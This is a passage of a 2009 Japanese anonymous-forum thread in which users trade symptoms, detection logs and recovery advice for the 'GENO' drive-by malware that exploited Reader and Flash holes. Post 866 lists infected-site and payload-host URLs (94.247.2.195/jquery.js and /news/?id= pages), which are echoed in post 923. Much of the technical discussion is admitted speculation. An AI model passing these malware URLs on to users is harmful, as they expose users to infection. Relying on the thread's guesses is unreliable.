ファイル名を指定して実行→regeditが起動する?


843 :名無しさん@お腹いっぱい。:2009/04/10(金) 15:02:51
でも>>156さんはReaderが8.1.4ならば脆弱性修正版
Flash Playerも最新版だったとのことですけど
それでも感染したということかな

844 :名無しさん@お腹いっぱい。:2009/04/10(金) 15:03:46
>>840
HDDも一個しかないしDVDだってあああああああああああああああああああああああ
>>842
できる・・・

845 :名無しさん@お腹いっぱい。:2009/04/10(金) 15:04:12
全容がわからないってのは不気味だな

846 :名無しさん@お腹いっぱい。:2009/04/10(金) 15:05:42
>>844
白とは言い切れないけど黒でもなさそう
グレー
感染は否定出来ないけど発病はしてないってとこか

847 :名無しさん@お腹いっぱい。:2009/04/10(金) 15:09:00
今から踏もうと思う

XP SP2パッチなし
Flash最新版
adobe readerは入れてない

848 : ◆W07s5cWHb. :2009/04/10(金) 15:10:47
>>838
最近の割れ厨はもともと無料なReaderまで割るのかw

849 :名無しさん@お腹いっぱい。:2009/04/10(金) 15:41:46
>>844
genoウイルスじゃなくて別のやつって可能性もあるね

850 :833:2009/04/10(金) 15:45:10
そーいえばwindowsもraederもflashもアップデートは問題なくできた。
結局、主な感染の兆候は無いんだけど、CPU使用率がなんか気になるんだよね。

1秒置きにCPU使用率が7〜100%間を行き来するんだけど、これってセレM420ぐらいだと普通の挙動?

851 :名無しさん@お腹いっぱい。:2009/04/10(金) 15:50:32
>>838
WGAなんて大昔にクラックされてるぜw
普通に正規品として通過する

852 : ◆W07s5cWHb. :2009/04/10(金) 15:51:32
>>850
レジストリエディタとかメモ帳もちゃんと起動する?
CPU使用率云々と言ってる位だからタスクマネージャーは起動してるんだと思うけど。

怪しいプロセスを監視するのなら↓をインスコして確認してみたらどうよ?

窓の杜 - Process Explorer
ttp://www.forest.impress.co.jp/lib/sys/wincust/taskservice/prcsxplorer.html
Process Explorer
ttp://technet.microsoft.com/en-us/sysinternals/bb896653.aspx

853 :833:2009/04/10(金) 15:55:32
regedit試した。問題なく起動。踏んだ時flashは9.0でreaderが7で最新ではなかったけど、Geno踏んだのが4日になる前だから微妙なんだよな。報告出だした4日10時前ならギリセーフなのだろうか・・・?

854 :名無しさん@お腹いっぱい。:2009/04/10(金) 15:58:08
Hijack Thisで調べてみたら?

855 :名無しさん@お腹いっぱい。:2009/04/10(金) 16:03:50
>>853
それ同じインスト環境だ
5日早朝踏んで再起時に終了プロセスの確認出て(開いてないpdf
再起したけどブルースクリーンにはならず
6日にGENOヴィルス知ってバックアップから復元してんで他は不明


856 : ◆N9P3SuvBPo :2009/04/10(金) 16:03:51
>853
てかお前、P2Pやってんのな。
リカバリ推奨

857 :名無しさん@お腹いっぱい。:2009/04/10(金) 16:04:12
>>852
感染しててもメモ帳は開くよ

858 : ◆W07s5cWHb. :2009/04/10(金) 16:05:58
>>853
少なくても4日10時頃なんてのは殆ど大本営発表レベルなんて信じたら負けってレベル。
少なくてもスレ上で最初に報告してた奴が書き込んだ時間がその頃ってだけで、なんの保証も無いから。
で、Genoも恐らくまともに調べずにスレの内容を都合よくテキトーに纏めて無断転載しているに等しいレベル。

結局、>>660の通りってこった。

859 :名無しさん@お腹いっぱい。:2009/04/10(金) 16:06:25
>>853
4日午前3時にはどっかのスレで報告があった
それより前だとわからんけどP2Pなら他のに感染してるんだろ

860 : ◆W07s5cWHb. :2009/04/10(金) 16:06:48
>>857
あ、そうだったっけか。こりゃまた失礼。

861 :名無しさん@お腹いっぱい。:2009/04/10(金) 16:09:55
GENO踏んだ時のログ(キングソフト) 助かったのか…
2009-04-04 12:42:15 ブラウザはバックグランドでファイルC:\DOCUME~1\USER1~~1\Temp\wJQs.exeをダウンロードしました


2009-04-04 12:42:16 ブラウザはバックグランドでファイルC:\DOCUME~1\USER1~~1\Temp\wJQs.exeをダウンロードしました


2009-04-04 12:42:38 ブラウザ上の疑わしいモジュールC:\DOCUME~1\USER1~~1\Temp\wJQs.exeの実行がブロックされました。



862 :名無しさん@お腹いっぱい。:2009/04/10(金) 16:18:16
まだ感染しっぱなしのサイトあるね…。
今は接続先は死んでるからデータ吸出しの被害は無いと思うけど、
接続先っていつ死んだんだろ…?

863 :名無しさん@お腹いっぱい。:2009/04/10(金) 16:19:18
wJQs.exe の検索結果 約 1,680 件中 1 - 100 件目 (0.40 秒)

864 :名無しさん@お腹いっぱい。:2009/04/10(金) 16:22:21
>862
突撃したらFirefoxクラッシュしたぞ

865 : ◆N9P3SuvBPo :2009/04/10(金) 16:23:05
でもGENOの対応には目を疑います。
せめて『リカバリして下さい』だったらな。

あと、リカバリせずになんとかして駆除しようと頑張ってる人もいるらしいが、
リカバリ自体特別難しいことじゃないですよ。
取り説に方法載ってるんですから。

リカバリしたくないという理由は…
1・リカバリディスクがない
2・取り説なくした
3・バックアップを取ってない
4・取り説読んでもよく分からない
他にもあるんだろうけどよ、1のケースならHDDのリカバリ領域から
リカバリできるのであれば、そこからリカバリすれば良い。
2のケースなら、画面の指示に従っていけば良い。
3のケースなら、即座にバックアップを取るか(バックアップ自体も難しくない)
全てを諦める。
4のケースなら、電気店に直接持ち込んでしてもらう。

866 :名無しさん@お腹いっぱい。:2009/04/10(金) 16:26:11
なんか仕込が増えてるんだけど?
ttp://mag-puppine.com/about/

ttp://94.247.2.195/news/?id=2

ttp://94.247.2.195/news/?id=3

ttp://94.247.2.195/jquery.js

ttp://94.247.2.195/news/?id=101

867 :名無しさん@お腹いっぱい。:2009/04/10(金) 16:32:37
ttpも抜けよ
専ブラだと普通にリンクされとるわ

868 :833:2009/04/10(金) 16:32:40
>>852-859
さんくす。

869 :名無しさん@お腹いっぱい。:2009/04/10(金) 16:34:41
>>865
USBメモリにでもバックアップしたい・・・んだがこのウイルスが入ってきそうで怖い

870 : ◆N9P3SuvBPo :2009/04/10(金) 16:39:38
>866
たしかに問題のコードがありますね。
俺の環境ではIEで踏んでも問題ありませんが、
他の人はアクセスなさらないように。

>869
USBメモリにバックアップと一緒に入ってしまいそうで怖いのであれば、
やはり、全部諦めろ。という答えしかできません。


871 : ◆W07s5cWHb. :2009/04/10(金) 16:44:48
>>869
ぶっちゃけ、このGonoウィルスは
PDFやFlashの脆弱性を突いてこれらを直に使わないサイトを経由して
強引に感染させちゃうという、斜め上の発想のウィルスなんで、
まだ中身のEXEファイルの解析が完了せず、
処理内容の全貌が明らかになっていない現状では
ちょっとUSBメモリを使用するのはリスキーだよね。

最終的に焼き捨てになるけど、
焼きソフトを使ってCD-RやDVD-R等に焼いた方がまだ安心出来る。

872 :名無しさん@お腹いっぱい。:2009/04/10(金) 16:53:11
GENO以外で感染の危険性もある(あった)んだから、
ウイルス感染のはっきりした確認方法がないのが厳しい。


873 :名無しさん@お腹いっぱい。:2009/04/10(金) 17:05:26
>>866
URL貼るなキモ豚

874 :名無しさん@お腹いっぱい。:2009/04/10(金) 17:10:15
評判の良い焼きソフト教えてくだしあ><

875 :名無しさん@お腹いっぱい。:2009/04/10(金) 17:14:04
>>866
URL貼るなリアルデブ

876 : ◆W07s5cWHb. :2009/04/10(金) 17:17:31
>>874
ぶっちゃけ、わざわざ金だして買わなくても
フリーソフトのimgburnで十分だったりする。

使い方とかは日本語化パッチ頒布してる↓に書かれてる。

日本語化パッチ
ttp://www.nihongoka.com/jpatch_main/imgburn

本体頒布元
ttp://www.imgburn.com/

877 :名無しさん@お腹いっぱい。:2009/04/10(金) 17:19:28
>>876
感染PCでそれが動かなくて途方にくれてるんだけど

878 :名無しさん@お腹いっぱい。:2009/04/10(金) 17:22:27
ggrks

879 : ◆W07s5cWHb. :2009/04/10(金) 17:24:36
>>877
ご愁傷様ですw

てか、どういう挙動なの?
他の別途インストールしたアプリから何から全滅ってのならまだ判るけど、
imgburnだけが起動しないって事なの?

880 :名無しさん@お腹いっぱい。:2009/04/10(金) 17:27:44
>>879
全滅じゃないよ 特定のソフトが起動しない

881 : ◆W07s5cWHb. :2009/04/10(金) 17:32:18
>>880
YesNoで答えて。

1.imgburnが起動すらしないって事?
2.感染以前からimgburnを使ってて以前はちゃんと動作してた?
3.他のライティングソフトを試しても一様に起動しないのか?

882 :名無しさん@お腹いっぱい。:2009/04/10(金) 17:33:03
もう終わったウイルスだから次スレ必要ないな
そもそもどこもgenoウイルスなんて言ってないし
名誉毀損も肌々しい

883 : ◆W07s5cWHb. :2009/04/10(金) 17:35:06
>>880
ついでに参考までに聞きたいけど、
実際に試して動かなかったソフトがあれば
判っている範囲で良いから列挙してちょうだいな。

884 :名無しさん@お腹いっぱい。:2009/04/10(金) 17:35:18
>>882
もう少し気の利いたこと言ってくれよ。
わかりやすすぎるだろ

885 :名無しさん@お腹いっぱい。:2009/04/10(金) 17:36:14

大変だね〜がんばって汚名挽回してね〜

886 :名無しさん@お腹いっぱい。:2009/04/10(金) 17:36:35

y 数年愛用
他のライティングは試してない

いろんなソフトで影響がでている。

887 :名無しさん@お腹いっぱい。:2009/04/10(金) 17:37:41
GENOの対応は悪いが一番悪いのがGENOって感じの流れで笑える
なんだよGENOウイルスってw

888 :名無しさん@お腹いっぱい。:2009/04/10(金) 17:37:54
>>876
ありがとう
うう・・・クリーンインスコ辛いお・・・

889 :名無しさん@お腹いっぱい。:2009/04/10(金) 17:40:11
いやあ店員さんも必死だねぇ

890 :名無しさん@お腹いっぱい。:2009/04/10(金) 17:40:24
>>882
肌々しいってなぁに?

891 : ◆W07s5cWHb. :2009/04/10(金) 17:40:44
>>886
レポートどうも。

それだと多分アレだね。レジストリの関連付けとか項目等をグチャクチャにされてしまっているのか、
Explorer.exeが乗っ取られてると、その種のバックアップ等を行えないように
Windows上の特定の機能を殺しちゃってるのかも知れないな。

892 :名無しさん@お腹いっぱい。:2009/04/10(金) 17:41:04
>>889
こんなウイルスに引っかかって本当に間抜けな奴だな
お前はw

893 :名無しさん@お腹いっぱい。:2009/04/10(金) 17:41:49
>>882
おつかれさまです
お詫びとかどうでもいいんでサーバ側の侵入経路と対策
教えていただけませんか?

894 :名無しさん@お腹いっぱい。:2009/04/10(金) 17:43:00
>>883
eBoostr
ホームページビルダー
クリップボード系のアプリ
IE FireFox
ISOを弄くる系のツール

タスクトレイのスタートアップは半分以下しか表示してない

まともに弄る気もなくすくらい使い物にならないから
放置してるw

895 :名無しさん@お腹いっぱい。:2009/04/10(金) 17:44:52
>>894
Skypeやメッセンジャーみたいな通信ソフトは動く?
ボットネットってIRC使ってなんかやってた話があったけど
IRC関連ソフトもどうかな
インストールされてないならスルーでおkれす

896 :名無しさん@お腹いっぱい。:2009/04/10(金) 17:45:20
このウイルスまじぱねぇ・・・
即死しないのが余計に辛い
「楽にしてくれ」って気持ちがわかってくるまじでw

897 : ◆W07s5cWHb. :2009/04/10(金) 17:48:17
>>894
そこまでやられたらアメリカなら確実に訴訟を起こしちゃうレベルだよなw

もし複数台のPCがあればそっちのPCのアンチウィルスソフトを最新にして
LAN越しにコピーしてウィルスをそっちのPCで駆除して貰いながら
データを移してしまえば良いかと思ったんだけど、
もしかするとライティングソフトの動作を阻害する位なら
普通LAN越しにコピー出来ない様にされちゃってるかも知れないな。

本当に辛いな。その状況は。

898 :GENO被害者:2009/04/10(金) 17:48:19
とりあえずIDでないから名前だけでも付けとくわ

>>880 >>894 とかは俺ね



>>895
MSNメッセは使えた
そのほかはインストールしてないからわかんない

899 :名無しさん@お腹いっぱい。:2009/04/10(金) 17:48:30
>>882>>892
別らしいんだけどつなぎかえ?別人?
おつかれさまです。ほんと。

900 :名無しさん@お腹いっぱい。:2009/04/10(金) 17:48:38
「このまま使い続けても大丈夫かも・・」と思わせる所があるかもね。
発病してなくてもゴミが残ってるかもしれないのが嫌だ。
クリーンインストールって言葉が実に良く出来てると実感w

901 :名無しさん@お腹いっぱい。:2009/04/10(金) 17:50:06
>>898
ちょっと気になっただけなんだが情報thx
ああでもその状態でメッセログインは危ないかも
気をつけてね

902 :名無しさん@お腹いっぱい。:2009/04/10(金) 17:51:34
なんかぶっ飛んだ憶測でスレが進行してますが(笑
誰も突っ込まないあたり感染実験してた人たちはいなくなっちゃったのかな

903 :GENO被害者:2009/04/10(金) 17:52:34
>>900
そうなのよ
再インストールするにも、4年もごちゃごちゃ使ったOSで
バックアップ作業が困難なんだわ。
なので、セキュリティーソフトの神対応を待つ事にしてる。

でもOSが破壊されてるのはわかってるんだ・・・(遠い目

904 :名無しさん@お腹いっぱい。:2009/04/10(金) 17:55:04
>ボットネットってIRC
!!?

905 :名無しさん@お腹いっぱい。:2009/04/10(金) 17:55:36
>>903
いや、被害者なのが判ってるならクリーンインストールしなよw

906 : ◆W07s5cWHb. :2009/04/10(金) 17:55:51
あと、蛇足ながら一言言うと
バックアップ時にFTPだけは仮に使えても極力使わないほうがいいと思う。

Explorer.exeがジャックされてウィルスをまともに食らってる状態だと
FTPログイン先やアカウント名、パスワード等が
クラッカーに漏れる可能性も十分にあり得そう。

で、クラッカーにそのログイン先のターゲットにされてしまうと。
接続先がイントラのFTP鯖だとその点どうにかなるかもしれないけど。

907 :GENO被害者:2009/04/10(金) 17:56:07
>>897
他のPCからアクセスするのも怖いw
といっても、ルーターですでに繋がってるけどね。
とりあえずUSBメモリにデータ入れる事はできたから
最悪はUSBメモリでバックアップしてOS入れなおす事にするよ

908 :名無しさん@お腹いっぱい。:2009/04/10(金) 17:57:09
GENOって結局本当にウイルスばらまいてたの?
感染の確認方法いまだにちゃんとでてないけど
ウイルスってやっぱりデマだったの?

909 :名無しさん@お腹いっぱい。:2009/04/10(金) 17:57:24
>>904
ほい
http://ja.wikipedia.org/wiki/%E3%83%9C%E3%83%83%E3%83%88%E3%83%8D%E3%83%83%E3%83%88

910 : ◆W07s5cWHb. :2009/04/10(金) 17:57:48
>>907
USBのブートレコードへの感染にはくれぐれも注意したほうがいいよ。

911 :GENO被害者:2009/04/10(金) 17:59:25
>>905
orz

>>906
うんw

912 :GENO被害者:2009/04/10(金) 18:01:18
>>910
そうなのよねー
バックアップしても、新しいOSに突っ込みたくないわw

913 :名無しさん@お腹いっぱい。:2009/04/10(金) 18:02:12
>>909
WikiのURLまで出して間違えに気づいてないのかお前は

914 :名無しさん@お腹いっぱい。:2009/04/10(金) 18:04:29
>>910
いい加減な憶測はやめようねw

915 :名無しさん@お腹いっぱい。:2009/04/10(金) 18:04:45
こういうヤツがウイルスに感染して
ウイルスに感染したからこんなとこに貼り付いてるんだよな

916 : ◆W07s5cWHb. :2009/04/10(金) 18:08:16
>>914
keianのSSDも出荷段階で感染してた位だから油断出来ないぞw

ttp://www.keian.co.jp/
ttp://pc.watch.impress.co.jp/docs/2009/0408/keian.htm

917 :名無しさん@お腹いっぱい。:2009/04/10(金) 18:09:19
http://takeshima.2ch.net/test/read.cgi/news4vip/1239059037/
441 以下、名無しにかわりましてVIPがお送りします 2009/04/07(火) 19:52:26.14 ID:jaXpHGCM0

URLの特徴は短縮が主
だけどyahooのトップの気付いたら飛ばされてるパターンも
あるから、一概に言えない
その場合
リンク踏み→ウイルスURL(非表示)→yahooトップ
とウイルスを持ってるサイトが表示されない可能性が高い
こういうのはバックドア系の典型で、ウイルス作成者が商用
にしてる可能性が高いことを裏付けるな

443 以下、名無しにかわりましてVIPがお送りします 2009/04/07(火) 19:57:41.08 ID:jaXpHGCM0

特にスパイウェア系のファイルがwindowsフォルダ内に
ランダムに生成されてしまうのがやっかい
その場合conime.exeの他にPDFだったり、windowsファイルに実際に存在する
ファイルと同一名称で生成されてしまうので検索も面倒
ただ生成されるファイルの多くが容量17kbだったりと共通点もある

918 :名無しさん@お腹いっぱい。:2009/04/10(金) 18:13:02
>>916
何度もいうがバックアップの類は大丈夫だといってるだろ

919 :名無しさん@お腹いっぱい。:2009/04/10(金) 18:13:47
カスペでも検出できない様に改変されてるっぽいのだけど

920 :名無しさん@お腹いっぱい。:2009/04/10(金) 18:24:43
>>913
ごめん。わからん。
IRCプロトコル使ってるんじゃないの?

921 : ◆W07s5cWHb. :2009/04/10(金) 18:25:00
>>918
そもそもだれも最後まで解析していないし、
明確な外部のソース等を提示していないのに
大丈夫もへったくれもないだろ。そもそも。

922 :GENO被害者:2009/04/10(金) 18:25:48
>>918
その理由は??
新たなウイルスジャンジャン実行してるかもしれないのに。

923 :名無しさん@お腹いっぱい。:2009/04/10(金) 18:32:12
検知しました: トロイの木馬 Exploit.JS.Pdfka.gz
URL: http://94.247.2.195/news/?id=2//data0000
というのが加わった

924 :名無しさん@お腹いっぱい。:2009/04/10(金) 18:33:38
川崎病並みにウイルス名が店名ってすばらしい
ジェノはノーベル賞やギネスビールに並んだ

925 :名無しさん@お腹いっぱい。:2009/04/10(金) 18:34:12
とりあえず乗っ取られてるサーバ全部止めて欲しいわ…

926 :名無しさん@お腹いっぱい。:2009/04/10(金) 18:35:09
>>921
USBメモリに感染を試みるような大胆なウイルスならこんなに手間取ってないからw
憶測で物を言う前に少しは自分で調べてみたら?

>>922
そもそもこいつがウイルスに感染したという前提になってるところからしておかしい。
確証もないのに勝手にウイルスと結びつけてリカバリー指示ですか。

927 :名無しさん@お腹いっぱい。:2009/04/10(金) 18:35:56
新たなウイルスをスパイウェアを呼び込む
部分的にレジストリ改変・破壊。各所に複製
PCの不具合が徐々に増えていって、最後にブルースクリーンあぽーん

928 :名無しさん@お腹いっぱい。:2009/04/10(金) 18:39:42
GENOウイルスとか業務妨害になるような
スレタイよく平気でつかられるな
どうせ人生捨てているニートなんだろうがwww

929 :名無しさん@お腹いっぱい。:2009/04/10(金) 18:40:55
> 業務妨害

930 :名無しさん@お腹いっぱい。:2009/04/10(金) 18:41:15
>>920
botネットは操り人形になったコンピューターのネットワークのことであって
IRCはマスターの通信手段に過ぎない

931 :名無しさん@お腹いっぱい。:2009/04/10(金) 18:45:17
TROJ_GENOME.BKがどうかした?

932 : ◆W07s5cWHb. :2009/04/10(金) 18:45:46
>>928
華麗で可憐な有閑マダムです><

933 :GENO被害者:2009/04/10(金) 18:45:55
>>926
工作するならもっと上手くやった方がいいと思う。

934 :名無しさん@お腹いっぱい。:2009/04/10(金) 18:49:31
>>933
悔しかった?w
GENOでも訴えれば楽になるんじゃない?w

935 :名無しさん@お腹いっぱい。:2009/04/10(金) 18:50:16
http://nusoku.s13.dxbeat.com/2/ch.cgi?table=kote&view=M&recpoint=0
おw

936 :名無しさん@お腹いっぱい。:2009/04/10(金) 18:52:46
ttp://www.virscan.org/report/c70869b3a1305b3e99e53fc2486139ad.html

これどうなの?Antivirのみ感染後検出可ってこと?

937 :名無しさん@お腹いっぱい。:2009/04/10(金) 18:54:02
>>936
>>788

938 :名無しさん@お腹いっぱい。:2009/04/10(金) 18:54:51
>>934は自分の脳内のウイルスも駆除できてない模様

939 :名無しさん@お腹いっぱい。:2009/04/10(金) 18:55:20
>>937
おk、把握。ありがとう

940 :名無しさん@お腹いっぱい。:2009/04/10(金) 18:57:11
>>938
煽りならν速でやれ

941 :名無しさん@お腹いっぱい。:2009/04/10(金) 19:00:04
>>932自演してるってことはばれてるよw

942 :名無しさん@お腹いっぱい。:2009/04/10(金) 19:04:22
ID無しでやってきてるセキュ板住民の目は誤魔化せないよ!

943 :名無しさん@お腹いっぱい。:2009/04/10(金) 19:06:11
無料オンラインスキャン10選、PCの安全性をブラウザでチェックニュース - page10 - CNET Japan
ttp://japan.cnet.com/news/sec/story/0,2000056024,20391377-10,00.htm

944 :名無しさん@お腹いっぱい。:2009/04/10(金) 19:08:01
>>943
無料オンラインスキャン10選、PCの安全性をブラウザでチェックニュース - CNET Japan
ttp://japan.cnet.com/news/sec/story/0,2000056024,20391377,00.htm

最初のページを紹介しないと。

945 :名無しさん@お腹いっぱい。:2009/04/10(金) 19:13:26
赤い傘最強伝説

946 :名無しさん@お腹いっぱい。:2009/04/10(金) 19:15:16
それを言うなら赤帽だろw

947 : ◆W07s5cWHb. :2009/04/10(金) 19:16:09
>>941
一応、これでも音響カプラ全盛期からネットを利用している位に
無駄に暦だけは長い元あめざーな古参だから、
その気になればいくらでもジサクジエン位は出来るけどさw

てか、ぶっちゃけ、ダイアルアップ時代は
複数のプロバイダを駆使して回線つなぎ舞えて完璧な迷彩を施してジサクジエンしてスレを伸ばしたりしたけど、
今更IDでない過疎板でベタな釣りして遊ぶ程、落ちぶれてはいないよw

まぁ、あれだ。この前、某過疎板に誤爆しちゃったけどなw

948 :名無しさん@お腹いっぱい。:2009/04/10(金) 19:18:52
このスレ見てるニュー速民いたら>>947を今すぐ持って帰れ


949 :名無しさん@お腹いっぱい。:2009/04/10(金) 19:20:53
>948
返品不可

950 :名無しさん@お腹いっぱい。:2009/04/10(金) 19:22:34
不妊ババって奴?

951 :名無しさん@お腹いっぱい。:2009/04/10(金) 19:25:50
>元美人秘書室長◆W07s5cWHb.
>(千葉県)の妄想虚言癖嫌われ池沼(beコテ)。千葉ババア、うんうんババアなどと呼ばれる。
>自信過剰、自意識過剰、妄想、嘘、知ったかぶり、全レス状態など
>異常に古参ぶるもそれ程ではない。他板でも嫌われている。

キチガイばっかセキュ板に来る。
どういうことだこれ。

952 : ◆W07s5cWHb. :2009/04/10(金) 19:32:00
それは、おいらに粘着してる基地外が書いたのだよ。
昔木っ端微塵に論破した奴か罵倒して遊んでいた相手か
荒らし系コテをヲチして遊んでいたら逆恨みされてるとか、そんな感じで。
無駄に歴が長いんで、無駄に敵が多いんだよ。そこんとこ判れ。

てか、そもそもあのν速コテ図鑑は
ν速で毎回VBS.Loveletterをコピペして貼り付ける事で有名だった
某基地外コテが開設しているサイトだ。
押して知るべし。

953 :名無しさん@お腹いっぱい。:2009/04/10(金) 19:32:14
>>951
見事にあてはまってるね

954 :名無しさん@お腹いっぱい。:2009/04/10(金) 19:36:39
>>951
うわ…きも

955 :名無しさん@お腹いっぱい。:2009/04/10(金) 19:36:57
>>952
DAPのスレ来てる人?

956 :名無しさん@お腹いっぱい。:2009/04/10(金) 19:37:20
◆W07s5cWHb. ←こいつの相手は薮パソユーザーと八頭に任せた。

957 :名無しさん@お腹いっぱい。:2009/04/10(金) 19:38:38
ちょっと待て

       その書き込みは

                 GENOかも

958 :名無しさん@お腹いっぱい。:2009/04/10(金) 19:39:06
とりあえず有用な情報を書いて欲しい。まぁでも明日の朝で一週間なんだな

959 :名無しさん@お腹いっぱい。:2009/04/10(金) 19:40:39
ttp://ecnavi.jp/help/information/info/221/
09/04/10[障害・サポート情報] 【重要】掲載のリンク先ページのウイルス感染について

お知らせ
【重要】ECナビの掲載広告にて発生したリンク先ページのウイルス感染について

この度、ECナビサイトにて掲載を行っておりました広告にてリンク先ページが
改ざんされた可能性があり、広告をクリックして遷移先ページを閲覧した
ご利用者様がウイルスに感染した可能性があるという事態が発生しました。

なお、対象となる広告は下記となります。

■対象広告
puppine(株式会社ブランジスタ)

■掲載期間、箇所
【4/2〜4/9  ポイントチャンス!】
://ecnavi.jp/frame/?url=http%3A%2F%2Fkensho.ecnavi.jp%2Fsearch%2F&KID=&search=&order=new
愛犬と一緒に楽しめる最新ライフスタイル情報が満載「puppine」

【4/9〜4/10 宝くじ ガラガラでポン!】
://point.ecnavi.jp/campaign/lottery/game/
ペットとわたしの新感覚ウェブマガジン「puppine」


※ECナビでは上記の危険認識により、4月10日 15時に広告掲載を停止いたしました。
今回のウィルスに関しましては、Flash/Adobe Readerの既知の脆弱性を悪用するもので、
最新版をお使いならば感染の危険がないという情報もございます。
しかしながら、被害状況等の詳細に関しましては現在掲載サイトにて確認を行っております。
状況が分かり次第再度ご報告させていただきますので、
今しばらくお待ちくださいますようお願いいたします。

960 : ◆W07s5cWHb. :2009/04/10(金) 19:41:39
>>955
DAPのスレって?

961 :名無しさん@お腹いっぱい。:2009/04/10(金) 19:43:02
そのコテの人の知識は役に立つ
ただ自分語りは控えていただきたい

962 : ◆W07s5cWHb. :2009/04/10(金) 19:44:06
>>961
すまんな。

963 :名無しさん@お腹いっぱい。:2009/04/10(金) 19:46:34
>>959
今頃発表か。
クリーンインストしれとはいわないのか。
コテは、叩かれやすくて大変だ。

964 :ハッカー大西 ◆LPbKkZKP8Q :2009/04/10(金) 19:49:53
逆アセンブル(?)ってやつやってやってもいいけど

965 :名無しさん@お腹いっぱい。:2009/04/10(金) 19:51:53
>>964
お前おもしろいなw

966 :名無しさん@お腹いっぱい。:2009/04/10(金) 19:53:44
>>964
お前まだいたのかw

967 :g0d0fH4ck大西 ◆LPbKkZKP8Q :2009/04/10(金) 19:57:21
>>966
セキュ板はずっと見てきてるからな。
俺もかなりの古参だし(草の根BBSの住人だった)
いま逆アセンブリやってる。


968 :名無しさん@お腹いっぱい。:2009/04/10(金) 19:58:14
逆逆アセンブリまであとどんくらい?

969 :名無しさん@お腹いっぱい。:2009/04/10(金) 19:58:51
>>967
どうやって逆アセンブルやるんですか?

970 :名無しさん@お腹いっぱい。:2009/04/10(金) 19:59:41
今回の騒ぎでクリーンインスト3台やった俺が来ましたよっと。
クリーンインストのおかげで3台共動きが軽快。
ただし四日間かかったけど。

何がブラウザキャッシュをクリアだ。ふざけんな。


971 :ハッカー大西 ◆LPbKkZKP8Q :2009/04/10(金) 20:00:44
>>968
大体わかってきた。
どうやらあらゆるプロセスを乗っ取るらしい

>>969
俺は今改造されたsqlsodbc.chmを逆アセンブルでしらべてるんだけど
やり方は、
スタートからアクセサリでメモ帳を開きそこに、sqlsodbc.chmをドロップアンドドラッグする。
そうすると文字列が出てくるだろ?

972 :名無しさん@お腹いっぱい。:2009/04/10(金) 20:02:52
>>971
お前久しぶりに見たわ。


973 :名無しさん@お腹いっぱい。:2009/04/10(金) 20:03:44
>>971
>プロセスを乗っ取るらしい
そういうのってSSMとかCOMODOのディフェンス+とかで防げないの?
今回のケースではどうだったんだろ?

974 :名無しさん@お腹いっぱい。:2009/04/10(金) 20:05:13
大西だったらν速から来た基地外の方がまし

975 :名無しさん@お腹いっぱい。:2009/04/10(金) 20:06:08
>>973
防げるんじゃないか?
ただHIPS入れてるやつなら当然jsオフにしてるだろうから、
引っかかったやつはそういないと思うが。


976 :名無しさん@お腹いっぱい。:2009/04/10(金) 20:07:48
コモドとかHIPS入ってるならそれより前の段階で防げるよ

977 :名無しさん@お腹いっぱい。:2009/04/10(金) 20:07:54
>>971
コードはなに語で書かれてる?

978 :名無しさん@お腹いっぱい。:2009/04/10(金) 20:08:59
>>973
てかそれより前の段階で防げるよ

979 :名無しさん@お腹いっぱい。:2009/04/10(金) 20:10:44
>>977
分かるわけないだろそんなこと。


980 :名無しさん@お腹いっぱい。:2009/04/10(金) 20:14:23
ν速の方のすれってまだあるの?

981 :名無しさん@お腹いっぱい。:2009/04/10(金) 20:14:23
リバエンするって言うもんだから(ry

982 :名無しさん@お腹いっぱい。:2009/04/10(金) 20:14:59
>>975
だよなぁ
防いでくんないと困るよな

>>978
前の段階って何?


983 :名無しさん@お腹いっぱい。:2009/04/10(金) 20:15:32
俺は再インスコするのが面倒だからアンチウィルスソフトで検出されたマルウェア等を片っ端から削除した。
sqlsodbc.chmも改竄されてたので一旦削除してから、クリーンな別PCからソレを移植した。
まぁ一応平穏な状態には戻った。

984 : ◆W07s5cWHb. :2009/04/10(金) 20:17:16
>>980
【0.1】ネットショップ「GENO」等でウイルス感染 業務再開するもGENOサイドは「キャッシュ消せ」とふざけた対応★11
http://tsushima.2ch.net/test/read.cgi/news/1239241638/


985 :名無しさん@お腹いっぱい。:2009/04/10(金) 20:18:55
>>980
もうグダグダで覗く価値なし

986 :名無しさん@お腹いっぱい。:2009/04/10(金) 20:20:25
いえーい!
再インスコした俺が通るよwwww

それで、フルスキャンで検知→駆除はできるようになったの??

987 :名無しさん@お腹いっぱい。:2009/04/10(金) 20:23:46
次スレは?

988 :名無しさん@お腹いっぱい。:2009/04/10(金) 20:29:56
>前の段階って何?
感染直前の段階、ぜい弱性をついて感染を試みるこの段階で警告がでるはず

>それで、フルスキャンで検知→駆除はできるようになったの??
AntiVirだけ感染後ドロップされる一つファイルを検知できる
検知、駆除以前にドロップするファイル数がこのウイルスは極端に少ない、
ウイルスの動きが把握し切れてないので完全に駆除できたとは言い切れない
よくて症状が治った程度

989 : ◆W07s5cWHb. :2009/04/10(金) 20:32:05
>>977
おいらはプログラマじゃないんで細かい事は判らないけど、
UPX圧縮を解除したLa.exeなら今ノートン先生の検疫から戻してバイナリエディタで開いてる。

ファイルの最後に空っぽのVSVersionInfoが在るからどー見てもVC系で作られたEXEだな。
確約出来ないけど。

証拠の画像
ttp://www1.axfc.net/uploader/Img/so/42510.jpg

990 :名無しさん@お腹いっぱい。:2009/04/10(金) 20:32:46
>>988
サンクス、もうしばらく注意必要って事ね。

991 :名無しさん@お腹いっぱい。:2009/04/10(金) 20:33:50
>>988
さんくす
感染を試みる段階で警告か
いままで一回も見たことないw
AntivirとCOMODOで固めてて良かったみたいだ
てかGENOってこの事件ではじめて知ったけど

992 : ◆W07s5cWHb. :2009/04/10(金) 20:36:32
あ、選んだロダがアレだったな。
専用ブラでもプレビュー出来ないし、ちと開くのが怖いな。、これだと。

993 :名無しさん@お腹いっぱい。:2009/04/10(金) 20:36:52
>>989
SSアップロードしてもらうまでもなかったんだが
手間取らせたね
サンキュウ

994 : ◆W07s5cWHb. :2009/04/10(金) 20:38:05
証拠画像上げなおし。
ttp://up2.viploader.net/pic/src/viploader975165.jpg

995 :991:2009/04/10(金) 20:38:32
あ、意味分かった
頓珍漢なこと聞いて済まなかった

996 :名無しさん@お腹いっぱい。:2009/04/10(金) 20:38:59
>>992
ここ比較的長持ちするしいいかも
http://ranobe.com/up/upload.html
ってもう上げちゃってるw

997 :名無しさん@お腹いっぱい。:2009/04/10(金) 20:42:27
次すれ立ててもこれ以上結論出そうにない

998 : ◆W07s5cWHb. :2009/04/10(金) 20:42:44
>>996
どもども。

999 :名無しさん@お腹いっぱい。:2009/04/10(金) 20:43:38
本スレ統合っえことでおk?

